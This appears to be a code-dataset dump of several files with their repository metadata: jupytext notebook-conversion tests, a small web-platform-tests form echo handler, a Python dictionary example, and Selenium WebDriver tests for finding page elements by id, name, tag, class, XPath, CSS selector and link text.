@pytest.mark.parametrize('nb_file', list_notebooks('Rmd'))
def test_Rmd_to_ipynb(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'ipynb', 'Rmd_to_ipynb')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_all', skip='Calysto|66'))
def test_ipynb_to_Rmd(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'Rmd', 'ipynb_to_Rmd')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_all', skip='Calysto'))
def test_ipynb_to_md(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'md', 'ipynb_to_md')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_idl'))
def test_ipynb_to_pro(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'pro', 'ipynb_to_script')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_idl'))
def test_ipynb_to_pro_percent(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'pro:percent', 'ipynb_to_percent')
@requires_pandoc
@pytest.mark.parametrize('nb_file',
list_notebooks('ipynb', skip='(functional|Notebook with|flavors|invalid)'))
def test_ipynb_to_pandoc(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'md:pandoc', 'ipynb_to_pandoc')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_js'))
def test_ipynb_to_js(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'js', 'ipynb_to_script')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_js'))
def test_ipynb_to_js_percent(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'js:percent', 'ipynb_to_percent')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_ts'))
def test_ipynb_to_ts(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'ts', 'ipynb_to_script')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_ts'))
def test_ipynb_to_ts_percent(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'ts:percent', 'ipynb_to_percent')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_scala'))
def test_ipynb_to_scala(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'scala', 'ipynb_to_script')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_scala'))
def test_ipynb_to_scala_percent(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'scala:percent', 'ipynb_to_percent')
| 41.222222
| 111
| 0.76183
| 1,936
| 13,356
| 4.792355
| 0.086777
| 0.09377
| 0.084285
| 0.114033
| 0.796185
| 0.762341
| 0.743587
| 0.731515
| 0.720629
| 0.689912
| 0
| 0.00094
| 0.123615
| 13,356
| 323
| 112
| 41.349845
| 0.791713
| 0.02351
| 0
| 0.229665
| 1
| 0
| 0.156845
| 0.01174
| 0
| 0
| 0
| 0
| 0.229665
| 1
| 0.229665
| false
| 0
| 0.043062
| 0
| 0.277512
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6b1c49a993bfa25ba6c39303880e8860fb3e1489
| 116
|
py
|
Python
|
xhr/resources/form.py
|
ziransun/wpt
|
ab8f451eb39eb198584d547f5d965ef54df2a86a
|
[
"BSD-3-Clause"
] | 8
|
2019-04-09T21:13:05.000Z
|
2021-11-23T17:25:18.000Z
|
xhr/resources/form.py
|
ziransun/wpt
|
ab8f451eb39eb198584d547f5d965ef54df2a86a
|
[
"BSD-3-Clause"
] | 21
|
2021-03-31T19:48:22.000Z
|
2022-03-12T00:24:53.000Z
|
xhr/resources/form.py
|
ziransun/wpt
|
ab8f451eb39eb198584d547f5d965ef54df2a86a
|
[
"BSD-3-Clause"
] | 11
|
2019-04-12T01:20:16.000Z
|
2021-11-23T17:25:02.000Z
|
def main(request, response):
return "id:%s;value:%s;" % (request.POST.first("id"), request.POST.first("value"))
| 38.666667
| 86
| 0.655172
| 17
| 116
| 4.470588
| 0.588235
| 0.289474
| 0.421053
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103448
| 116
| 2
| 87
| 58
| 0.730769
| 0
| 0
| 0
| 0
| 0
| 0.189655
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
8617975f1d304c69a623d427334d968da71b7293
| 233
|
py
|
Python
|
Week3/01. Dicts.py
|
HawkingLaugh/Data-Processing-Using-Python
|
6c4d7e09317aee41684731d5611f2f0dab217b2b
|
[
"MIT"
] | null | null | null |
Week3/01. Dicts.py
|
HawkingLaugh/Data-Processing-Using-Python
|
6c4d7e09317aee41684731d5611f2f0dab217b2b
|
[
"MIT"
] | null | null | null |
Week3/01. Dicts.py
|
HawkingLaugh/Data-Processing-Using-Python
|
6c4d7e09317aee41684731d5611f2f0dab217b2b
|
[
"MIT"
] | null | null | null |
aInfo = {'A':3000, 'B':2000, 'C':4500, 'D':8000}
Info = [('A',3000), ('B',2000), ('C',4500), ('D',8000)]
bInfo = dict(Info)
cInfo = dict([['A',3000], ['B',2000], ['C', 4500], ['D', 8000]])
dInfo = dict(A=3000, B=2000, C=4500, D=8000)
| 46.6
| 64
| 0.515021
| 41
| 233
| 2.926829
| 0.341463
| 0.166667
| 0.2
| 0.333333
| 0.733333
| 0.733333
| 0.733333
| 0.733333
| 0.4
| 0
| 0
| 0.312195
| 0.120172
| 233
| 5
| 65
| 46.6
| 0.273171
| 0
| 0
| 0
| 0
| 0
| 0.051282
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
861a10692b95bf3b245b9db4b73b8b464b1bacb9
| 24,468
|
py
|
Python
|
py/test/selenium/webdriver/common/driver_element_finding_tests.py
|
sagarkasaram/venky
|
2d3a1476118ab6c89c9d3caa2eac9625b7c78207
|
[
"Apache-2.0"
] | 1
|
2019-06-08T23:01:50.000Z
|
2019-06-08T23:01:50.000Z
|
py/test/selenium/webdriver/common/driver_element_finding_tests.py
|
sagarkasaram/venky
|
2d3a1476118ab6c89c9d3caa2eac9625b7c78207
|
[
"Apache-2.0"
] | null | null | null |
py/test/selenium/webdriver/common/driver_element_finding_tests.py
|
sagarkasaram/venky
|
2d3a1476118ab6c89c9d3caa2eac9625b7c78207
|
[
"Apache-2.0"
] | 1
|
2019-06-18T18:03:16.000Z
|
2019-06-18T18:03:16.000Z
|
# Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import pytest
from selenium.webdriver.common.by import By
from selenium.common.exceptions import (
InvalidElementStateException,
InvalidSelectorException,
NoSuchElementException,
NoSuchWindowException,
WebDriverException)
# By.id positive
def test_Should_Be_Able_To_Find_ASingle_Element_By_Id(driver, pages):
pages.load("xhtmlTest.html")
element = driver.find_element(By.ID, "linkId")
assert element.get_attribute("id") == "linkId"
def test_Should_Be_Able_To_Find_ASingle_Element_By_Numeric_Id(driver, pages):
pages.load("nestedElements.html")
element = driver.find_element(By.ID, "2")
assert element.get_attribute("id") == "2"
def test_should_be_able_to_find_an_element_with_css_escape(driver, pages):
pages.load("idElements.html")
element = driver.find_element(By.ID, "with.dots")
assert element.get_attribute("id") == "with.dots"
def test_Should_Be_Able_To_Find_Multiple_Elements_By_Id(driver, pages):
pages.load("nestedElements.html")
elements = driver.find_elements(By.ID, "test_id")
assert len(elements) == 2
def test_Should_Be_Able_To_Find_Multiple_Elements_By_Numeric_Id(driver, pages):
pages.load("nestedElements.html")
elements = driver.find_elements(By.ID, "2")
assert len(elements) == 8
# By.id negative
def test_Should_Not_Be_Able_To_Locate_By_Id_ASingle_Element_That_Does_Not_Exist(driver, pages):
pages.load("formPage.html")
with pytest.raises(NoSuchElementException):
driver.find_element(By.ID, "non_Existent_Button")
def test_Should_Not_Be_Able_To_Locate_By_Id_Multiple_Elements_That_Do_Not_Exist(driver, pages):
pages.load("formPage.html")
elements = driver.find_elements(By.ID, "non_Existent_Button")
assert len(elements) == 0
@pytest.mark.xfail_phantomjs(raises=NoSuchWindowException)
def test_Finding_ASingle_Element_By_Empty_Id_Should_Throw(driver, pages):
pages.load("formPage.html")
with pytest.raises(NoSuchElementException):
driver.find_element(By.ID, "")
@pytest.mark.xfail_phantomjs(raises=NoSuchElementException)
def test_Finding_Multiple_Elements_By_Empty_Id_Should_Return_Empty_List(driver, pages):
pages.load("formPage.html")
elements = driver.find_elements(By.ID, "")
assert len(elements) == 0
def test_Finding_ASingle_Element_By_Id_With_Space_Should_Throw(driver, pages):
pages.load("formPage.html")
with pytest.raises(NoSuchElementException):
driver.find_element(By.ID, "nonexistent button")
def test_Finding_Multiple_Elements_By_Id_With_Space_Should_Return_Empty_List(driver, pages):
pages.load("formPage.html")
elements = driver.find_elements(By.ID, "nonexistent button")
assert len(elements) == 0
# By.name positive
def test_Should_Be_Able_To_Find_ASingle_Element_By_Name(driver, pages):
pages.load("formPage.html")
element = driver.find_element(By.NAME, "checky")
assert element.get_attribute("value") == "furrfu"
def test_Should_Be_Able_To_Find_Multiple_Elements_By_Name(driver, pages):
pages.load("nestedElements.html")
elements = driver.find_elements(By.NAME, "checky")
assert len(elements) > 1
def test_Should_Be_Able_To_Find_An_Element_That_Does_Not_Support_The_Name_Property(driver, pages):
pages.load("nestedElements.html")
element = driver.find_element(By.NAME, "div1")
assert element.get_attribute("name") == "div1"
# By.name negative
def test_Should_Not_Be_Able_To_Locate_By_Name_ASingle_Element_That_Does_Not_Exist(driver, pages):
pages.load("formPage.html")
with pytest.raises(NoSuchElementException):
driver.find_element(By.NAME, "non_Existent_Button")
def test_Should_Not_Be_Able_To_Locate_By_Name_Multiple_Elements_That_Do_Not_Exist(driver, pages):
pages.load("formPage.html")
elements = driver.find_elements(By.NAME, "non_Existent_Button")
assert len(elements) == 0
@pytest.mark.xfail_phantomjs(raises=NoSuchWindowException)
def test_Finding_ASingle_Element_By_Empty_Name_Should_Throw(driver, pages):
pages.load("formPage.html")
with pytest.raises(NoSuchElementException):
driver.find_element(By.NAME, "")
@pytest.mark.xfail_phantomjs(raises=NoSuchElementException)
def test_Finding_Multiple_Elements_By_Empty_Name_Should_Return_Empty_List(driver, pages):
pages.load("formPage.html")
elements = driver.find_elements(By.NAME, "")
assert len(elements) == 0
def test_Finding_ASingle_Element_By_Name_With_Space_Should_Throw(driver, pages):
pages.load("formPage.html")
with pytest.raises(NoSuchElementException):
driver.find_element(By.NAME, "nonexistent button")
def test_Finding_Multiple_Elements_By_Name_With_Space_Should_Return_Empty_List(driver, pages):
pages.load("formPage.html")
elements = driver.find_elements(By.NAME, "nonexistent button")
assert len(elements) == 0
# By.tag_Name positive
def test_Should_Be_Able_To_Find_ASingle_Element_By_Tag_Name(driver, pages):
pages.load("formPage.html")
element = driver.find_element(By.TAG_NAME, "input")
assert element.tag_name.lower() == "input"
def test_Should_Be_Able_To_Find_Multiple_Elements_By_Tag_Name(driver, pages):
pages.load("formPage.html")
elements = driver.find_elements(By.TAG_NAME, "input")
assert len(elements) > 1
# By.tag_Name negative
def test_Should_Not_Be_Able_To_Locate_By_Tag_Name_ASingle_Element_That_Does_Not_Exist(driver, pages):
pages.load("formPage.html")
with pytest.raises(NoSuchElementException):
driver.find_element(By.TAG_NAME, "non_Existent_Button")
def test_Should_Not_Be_Able_To_Locate_By_Tag_Name_Multiple_Elements_That_Do_Not_Exist(driver, pages):
pages.load("formPage.html")
elements = driver.find_elements(By.TAG_NAME, "non_Existent_Button")
assert len(elements) == 0
@pytest.mark.xfail_chrome(
reason='https://bugs.chromium.org/p/chromedriver/issues/detail?id=1541')
@pytest.mark.xfail_phantomjs
def test_Finding_ASingle_Element_By_Empty_Tag_Name_Should_Throw(driver, pages):
pages.load("formPage.html")
with pytest.raises(InvalidSelectorException):
driver.find_element(By.TAG_NAME, "")
@pytest.mark.xfail_chrome(
reason='https://bugs.chromium.org/p/chromedriver/issues/detail?id=1541')
@pytest.mark.xfail_phantomjs
def test_Finding_Multiple_Elements_By_Empty_Tag_Name_Should_Throw(driver, pages):
pages.load("formPage.html")
with pytest.raises(InvalidSelectorException):
driver.find_elements(By.TAG_NAME, "")
def test_Finding_ASingle_Element_By_Tag_Name_With_Space_Should_Throw(driver, pages):
pages.load("formPage.html")
with pytest.raises(NoSuchElementException):
driver.find_element(By.TAG_NAME, "nonexistent button")
def test_Finding_Multiple_Elements_By_Tag_Name_With_Space_Should_Return_Empty_List(driver, pages):
pages.load("formPage.html")
elements = driver.find_elements(By.TAG_NAME, "nonexistent button")
assert len(elements) == 0
# By.class_Name positive
def test_Should_Be_Able_To_Find_ASingle_Element_By_Class(driver, pages):
pages.load("xhtmlTest.html")
element = driver.find_element(By.CLASS_NAME, "extraDiv")
assert "Another div starts here." in element.text
def test_Should_Be_Able_To_Find_Multiple_Elements_By_Class_Name(driver, pages):
pages.load("xhtmlTest.html")
elements = driver.find_elements(By.CLASS_NAME, "nameC")
assert len(elements) > 1
def test_Should_Find_Element_By_Class_When_It_Is_The_First_Name_Among_Many(driver, pages):
pages.load("xhtmlTest.html")
element = driver.find_element(By.CLASS_NAME, "nameA")
assert element.text == "An H2 title"
def test_Should_Find_Element_By_Class_When_It_Is_The_Last_Name_Among_Many(driver, pages):
pages.load("xhtmlTest.html")
element = driver.find_element(By.CLASS_NAME, "nameC")
assert element.text == "An H2 title"
def test_Should_Find_Element_By_Class_When_It_Is_In_The_Middle_Among_Many(driver, pages):
pages.load("xhtmlTest.html")
element = driver.find_element(By.CLASS_NAME, "nameBnoise")
assert element.text == "An H2 title"
def test_Should_Find_Element_By_Class_When_Its_Name_Is_Surrounded_By_Whitespace(driver, pages):
pages.load("xhtmlTest.html")
element = driver.find_element(By.CLASS_NAME, "spaceAround")
assert element.text == "Spaced out"
def test_Should_Find_Elements_By_Class_When_Its_Name_Is_Surrounded_By_Whitespace(driver, pages):
pages.load("xhtmlTest.html")
elements = driver.find_elements(By.CLASS_NAME, "spaceAround")
assert len(elements) == 1
assert elements[0].text == "Spaced out"
# By.class_Name negative
def test_Should_Not_Find_Element_By_Class_When_The_Name_Queried_Is_Shorter_Than_Candidate_Name(driver, pages):
pages.load("xhtmlTest.html")
with pytest.raises(NoSuchElementException):
driver.find_element(By.CLASS_NAME, "name_B")
@pytest.mark.xfail_phantomjs(raises=NoSuchWindowException)
def test_Finding_ASingle_Element_By_Empty_Class_Name_Should_Throw(driver, pages):
pages.load("xhtmlTest.html")
with pytest.raises(NoSuchElementException):
driver.find_element(By.CLASS_NAME, "")
def test_Finding_Multiple_Elements_By_Empty_Class_Name_Should_Throw(driver, pages):
pages.load("xhtmlTest.html")
with pytest.raises(NoSuchElementException):
driver.find_elements(By.CLASS_NAME, "")
@pytest.mark.xfail_phantomjs(raises=WebDriverException)
def test_Finding_ASingle_Element_By_Compound_Class_Name_Should_Throw(driver, pages):
pages.load("xhtmlTest.html")
with pytest.raises(NoSuchElementException):
driver.find_element(By.CLASS_NAME, "a b")
@pytest.mark.xfail_phantomjs(raises=InvalidElementStateException)
def test_Finding_ASingle_Element_By_Invalid_Class_Name_Should_Throw(driver, pages):
pages.load("xhtmlTest.html")
with pytest.raises(NoSuchElementException):
driver.find_element(By.CLASS_NAME, "!@#$%^&*")
@pytest.mark.xfail_phantomjs(raises=InvalidElementStateException)
def test_Finding_Multiple_Elements_By_Invalid_Class_Name_Should_Throw(driver, pages):
pages.load("xhtmlTest.html")
with pytest.raises(NoSuchElementException):
driver.find_elements(By.CLASS_NAME, "!@#$%^&*")
# By.xpath positive
def test_Should_Be_Able_To_Find_ASingle_Element_By_XPath(driver, pages):
pages.load("xhtmlTest.html")
element = driver.find_element(By.XPATH, "//h1")
assert element.text == "XHTML Might Be The Future"
def test_Should_Be_Able_To_Find_Multiple_Elements_By_XPath(driver, pages):
pages.load("xhtmlTest.html")
elements = driver.find_elements(By.XPATH, "//div")
assert len(elements) == 13
def test_Should_Be_Able_To_Find_Many_Elements_Repeatedly_By_XPath(driver, pages):
pages.load("xhtmlTest.html")
xpath = "//node()[contains(@id,'id')]"
assert len(driver.find_elements(By.XPATH, xpath)) == 3
xpath = "//node()[contains(@id,'nope')]"
assert len(driver.find_elements(By.XPATH, xpath)) == 0
def test_Should_Be_Able_To_Identify_Elements_By_Class(driver, pages):
pages.load("xhtmlTest.html")
header = driver.find_element(By.XPATH, "//h1[@class='header']")
assert header.text == "XHTML Might Be The Future"
def test_Should_Be_Able_To_Find_An_Element_By_XPath_With_Multiple_Attributes(driver, pages):
pages.load("formPage.html")
element = driver.find_element(
By.XPATH, "//form[@name='optional']/input[@type='submit' and @value='Click!']")
assert element.tag_name.lower() == "input"
assert element.get_attribute("value") == "Click!"
def test_Finding_ALink_By_Xpath_Should_Locate_An_Element_With_The_Given_Text(driver, pages):
pages.load("xhtmlTest.html")
element = driver.find_element(By.XPATH, "//a[text()='click me']")
assert element.text == "click me"
def test_Finding_ALink_By_Xpath_Using_Contains_Keyword_Should_Work(driver, pages):
pages.load("nestedElements.html")
element = driver.find_element(By.XPATH, "//a[contains(.,'hello world')]")
assert "hello world" in element.text
@pytest.mark.xfail_chrome(raises=InvalidSelectorException)
@pytest.mark.xfail_firefox(raises=InvalidSelectorException)
@pytest.mark.xfail_remote(raises=InvalidSelectorException)
@pytest.mark.xfail_marionette(raises=WebDriverException)
@pytest.mark.xfail_phantomjs(raises=InvalidSelectorException)
@pytest.mark.xfail_safari(raises=NoSuchElementException)
def test_Should_Be_Able_To_Find_Element_By_XPath_With_Namespace(driver, pages):
pages.load("svgPage.html")
element = driver.find_element(By.XPATH, "//svg:svg//svg:text")
assert element.text == "Test Chart"
def test_Should_Be_Able_To_Find_Element_By_XPath_In_Xml_Document(driver, pages):
pages.load("simple.xml")
element = driver.find_element(By.XPATH, "//foo")
assert "baz" in element.text
# By.xpath negative
def test_Should_Throw_An_Exception_When_There_Is_No_Link_To_Click(driver, pages):
pages.load("xhtmlTest.html")
with pytest.raises(NoSuchElementException):
driver.find_element(By.XPATH, "//a[@id='Not here']")
def test_Should_Throw_InvalidSelectorException_When_XPath_Is_Syntactically_Invalid_In_Driver_Find_Element(driver, pages):
pages.load("formPage.html")
with pytest.raises(InvalidSelectorException):
driver.find_element(By.XPATH, "this][isnot][valid")
def test_Should_Throw_InvalidSelectorException_When_XPath_Is_Syntactically_Invalid_In_Driver_Find_Elements(driver, pages):
pages.load("formPage.html")
with pytest.raises(InvalidSelectorException):
driver.find_elements(By.XPATH, "this][isnot][valid")
def test_Should_Throw_InvalidSelectorException_When_XPath_Is_Syntactically_Invalid_In_Element_Find_Element(driver, pages):
pages.load("formPage.html")
body = driver.find_element(By.TAG_NAME, "body")
with pytest.raises(InvalidSelectorException):
body.find_element(By.XPATH, "this][isnot][valid")
def test_Should_Throw_InvalidSelectorException_When_XPath_Is_Syntactically_Invalid_In_Element_Find_Elements(driver, pages):
pages.load("formPage.html")
body = driver.find_element(By.TAG_NAME, "body")
with pytest.raises(InvalidSelectorException):
body.find_elements(By.XPATH, "this][isnot][valid")
def test_Should_Throw_InvalidSelectorException_When_XPath_Returns_Wrong_Type_In_Driver_Find_Element(driver, pages):
pages.load("formPage.html")
with pytest.raises(InvalidSelectorException):
driver.find_element(By.XPATH, "count(//input)")
def test_Should_Throw_InvalidSelectorException_When_XPath_Returns_Wrong_Type_In_Driver_Find_Elements(driver, pages):
pages.load("formPage.html")
with pytest.raises(InvalidSelectorException):
driver.find_elements(By.XPATH, "count(//input)")
def test_Should_Throw_InvalidSelectorException_When_XPath_Returns_Wrong_Type_In_Element_Find_Element(driver, pages):
pages.load("formPage.html")
body = driver.find_element(By.TAG_NAME, "body")
with pytest.raises(InvalidSelectorException):
body.find_element(By.XPATH, "count(//input)")
def test_Should_Throw_InvalidSelectorException_When_XPath_Returns_Wrong_Type_In_Element_Find_Elements(driver, pages):
pages.load("formPage.html")
body = driver.find_element(By.TAG_NAME, "body")
with pytest.raises(InvalidSelectorException):
body.find_elements(By.XPATH, "count(//input)")
# By.css_Selector positive
def test_Should_Be_Able_To_Find_ASingle_Element_By_Css_Selector(driver, pages):
pages.load("xhtmlTest.html")
element = driver.find_element(By.CSS_SELECTOR, "div.content")
assert element.tag_name.lower() == "div"
assert element.get_attribute("class") == "content"
def test_Should_Be_Able_To_Find_Multiple_Elements_By_Css_Selector(driver, pages):
pages.load("xhtmlTest.html")
elements = driver.find_elements(By.CSS_SELECTOR, "p")
assert len(elements) > 1
def test_Should_Be_Able_To_Find_ASingle_Element_By_Compound_Css_Selector(driver, pages):
pages.load("xhtmlTest.html")
element = driver.find_element(By.CSS_SELECTOR, "div.extraDiv, div.content")
assert element.tag_name.lower() == "div"
assert element.get_attribute("class") == "content"
def test_Should_Be_Able_To_Find_Multiple_Elements_By_Compound_Css_Selector(driver, pages):
pages.load("xhtmlTest.html")
elements = driver.find_elements(By.CSS_SELECTOR, "div.extraDiv, div.content")
assert len(elements) > 1
assert elements[0].get_attribute("class") == "content"
assert elements[1].get_attribute("class") == "extraDiv"
def test_Should_Be_Able_To_Find_An_Element_By_Boolean_Attribute_Using_Css_Selector(driver, pages):
pages.load("locators_tests/boolean_attribute_selected.html")
element = driver.find_element(By.CSS_SELECTOR, "option[selected='selected']")
assert element.get_attribute("value") == "two"
def test_Should_Be_Able_To_Find_An_Element_By_Boolean_Attribute_Using_Short_Css_Selector(driver, pages):
pages.load("locators_tests/boolean_attribute_selected.html")
element = driver.find_element(By.CSS_SELECTOR, "option[selected]")
assert element.get_attribute("value") == "two"
def test_Should_Be_Able_To_Find_An_Element_By_Boolean_Attribute_Using_Short_Css_Selector_On_Html4Page(driver, pages):
pages.load("locators_tests/boolean_attribute_selected_html4.html")
element = driver.find_element(By.CSS_SELECTOR, "option[selected]")
assert element.get_attribute("value") == "two"
# By.css_Selector negative
def test_Should_Not_Find_Element_By_Css_Selector_When_There_Is_No_Such_Element(driver, pages):
pages.load("xhtmlTest.html")
with pytest.raises(NoSuchElementException):
driver.find_element(By.CSS_SELECTOR, ".there-is-no-such-class")
def test_Should_Not_Find_Elements_By_Css_Selector_When_There_Is_No_Such_Element(driver, pages):
pages.load("xhtmlTest.html")
elements = driver.find_elements(By.CSS_SELECTOR, ".there-is-no-such-class")
assert len(elements) == 0
@pytest.mark.xfail_phantomjs(raises=NoSuchWindowException)
def test_Finding_ASingle_Element_By_Empty_Css_Selector_Should_Throw(driver, pages):
pages.load("xhtmlTest.html")
with pytest.raises(NoSuchElementException):
driver.find_element(By.CSS_SELECTOR, "")
def test_Finding_Multiple_Elements_By_Empty_Css_Selector_Should_Throw(driver, pages):
pages.load("xhtmlTest.html")
with pytest.raises(NoSuchElementException):
driver.find_elements(By.CSS_SELECTOR, "")
@pytest.mark.xfail_phantomjs(raises=InvalidElementStateException)
def test_Finding_ASingle_Element_By_Invalid_Css_Selector_Should_Throw(driver, pages):
pages.load("xhtmlTest.html")
with pytest.raises(NoSuchElementException):
driver.find_element(By.CSS_SELECTOR, "//a/b/c[@id='1']")
@pytest.mark.xfail_phantomjs(raises=InvalidElementStateException)
def test_Finding_Multiple_Elements_By_Invalid_Css_Selector_Should_Throw(driver, pages):
pages.load("xhtmlTest.html")
with pytest.raises(NoSuchElementException):
driver.find_elements(By.CSS_SELECTOR, "//a/b/c[@id='1']")
# By.link_Text positive
def test_Should_Be_Able_To_Find_ALink_By_Text(driver, pages):
pages.load("xhtmlTest.html")
link = driver.find_element(By.LINK_TEXT, "click me")
assert link.text == "click me"
def test_Should_Be_Able_To_Find_Multiple_Links_By_Text(driver, pages):
pages.load("xhtmlTest.html")
elements = driver.find_elements(By.LINK_TEXT, "click me")
assert len(elements) == 2
def test_Should_Find_Element_By_Link_Text_Containing_Equals_Sign(driver, pages):
pages.load("xhtmlTest.html")
element = driver.find_element(By.LINK_TEXT, "Link=equalssign")
assert element.get_attribute("id") == "linkWithEqualsSign"
def test_Should_Find_Multiple_Elements_By_Link_Text_Containing_Equals_Sign(driver, pages):
pages.load("xhtmlTest.html")
elements = driver.find_elements(By.LINK_TEXT, "Link=equalssign")
assert 1 == len(elements)
assert elements[0].get_attribute("id") == "linkWithEqualsSign"
def test_finds_By_Link_Text_On_Xhtml_Page(driver, pages):
pages.load("actualXhtmlPage.xhtml")
link_Text = "Foo"
element = driver.find_element(By.LINK_TEXT, link_Text)
assert element.text == link_Text
def test_Link_With_Formatting_Tags(driver, pages):
pages.load("simpleTest.html")
elem = driver.find_element(By.ID, "links")
res = elem.find_element(By.PARTIAL_LINK_TEXT, "link with formatting tags")
assert res.text == "link with formatting tags"
def test_Driver_Can_Get_Link_By_Link_Test_Ignoring_Trailing_Whitespace(driver, pages):
pages.load("simpleTest.html")
link = driver.find_element(By.LINK_TEXT, "link with trailing space")
assert link.get_attribute("id") == "linkWithTrailingSpace"
assert link.text == "link with trailing space"
# By.link_Text negative
def test_Should_Not_Be_Able_To_Locate_By_Link_Text_ASingle_Element_That_Does_Not_Exist(driver, pages):
pages.load("xhtmlTest.html")
with pytest.raises(NoSuchElementException):
driver.find_element(By.LINK_TEXT, "Not here either")
def test_Should_Not_Be_Able_To_Locate_By_Link_Text_Multiple_Elements_That_Do_Not_Exist(driver, pages):
pages.load("xhtmlTest.html")
elements = driver.find_elements(By.LINK_TEXT, "Not here either")
assert len(elements) == 0
# By.partial_Link_Text positive
def test_Should_Be_Able_To_Find_Multiple_Elements_By_Partial_Link_Text(driver, pages):
pages.load("xhtmlTest.html")
elements = driver.find_elements(By.PARTIAL_LINK_TEXT, "ick me")
assert len(elements) == 2
def test_Should_Be_Able_To_Find_ASingle_Element_By_Partial_Link_Text(driver, pages):
pages.load("xhtmlTest.html")
element = driver.find_element(By.PARTIAL_LINK_TEXT, "anon")
assert "anon" in element.text
def test_Should_Find_Element_By_Partial_Link_Text_Containing_Equals_Sign(driver, pages):
pages.load("xhtmlTest.html")
element = driver.find_element(By.PARTIAL_LINK_TEXT, "Link=")
assert element.get_attribute("id") == "linkWithEqualsSign"
def test_Should_Find_Multiple_Elements_By_Partial_Link_Text_Containing_Equals_Sign(driver, pages):
pages.load("xhtmlTest.html")
elements = driver.find_elements(By.PARTIAL_LINK_TEXT, "Link=")
assert len(elements) == 1
assert elements[0].get_attribute("id") == "linkWithEqualsSign"
# Misc tests
def test_Driver_Should_Be_Able_To_Find_Elements_After_Loading_More_Than_One_Page_At_ATime(driver, pages):
pages.load("formPage.html")
pages.load("xhtmlTest.html")
link = driver.find_element(By.LINK_TEXT, "click me")
assert link.text == "click me"
# You don't want to ask why this is here
def test_When_Finding_By_Name_Should_Not_Return_By_Id(driver, pages):
pages.load("formPage.html")
element = driver.find_element(By.NAME, "id-name1")
assert element.get_attribute("value") == "name"
element = driver.find_element(By.ID, "id-name1")
assert element.get_attribute("value") == "id"
element = driver.find_element(By.NAME, "id-name2")
assert element.get_attribute("value") == "name"
element = driver.find_element(By.ID, "id-name2")
assert element.get_attribute("value") == "id"
def test_Should_Be_Able_To_Find_AHidden_Elements_By_Name(driver, pages):
pages.load("formPage.html")
element = driver.find_element(By.NAME, "hidden")
assert element.get_attribute("name") == "hidden"
@pytest.mark.xfail_marionette(
reason='https://bugzilla.mozilla.org/show_bug.cgi?id=1312674',
run=False)
def test_Should_Not_Be_Able_To_Find_An_Element_On_ABlank_Page(driver, pages):
driver.get("about:blank")
with pytest.raises(NoSuchElementException):
driver.find_element(By.TAG_NAME, "a")
| 37.527607
| 123
| 0.774522
| 3,369
| 24,468
| 5.267438
| 0.08786
| 0.049701
| 0.079342
| 0.099177
| 0.854164
| 0.818832
| 0.784628
| 0.752113
| 0.715203
| 0.697509
| 0
| 0.003147
| 0.11701
| 24,468
| 651
| 124
| 37.585253
| 0.818237
| 0.045611
| 0
| 0.438554
| 0
| 0
| 0.136976
| 0.017326
| 0
| 0
| 0
| 0
| 0.168675
| 1
| 0.214458
| false
| 0
| 0.007229
| 0
| 0.221687
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
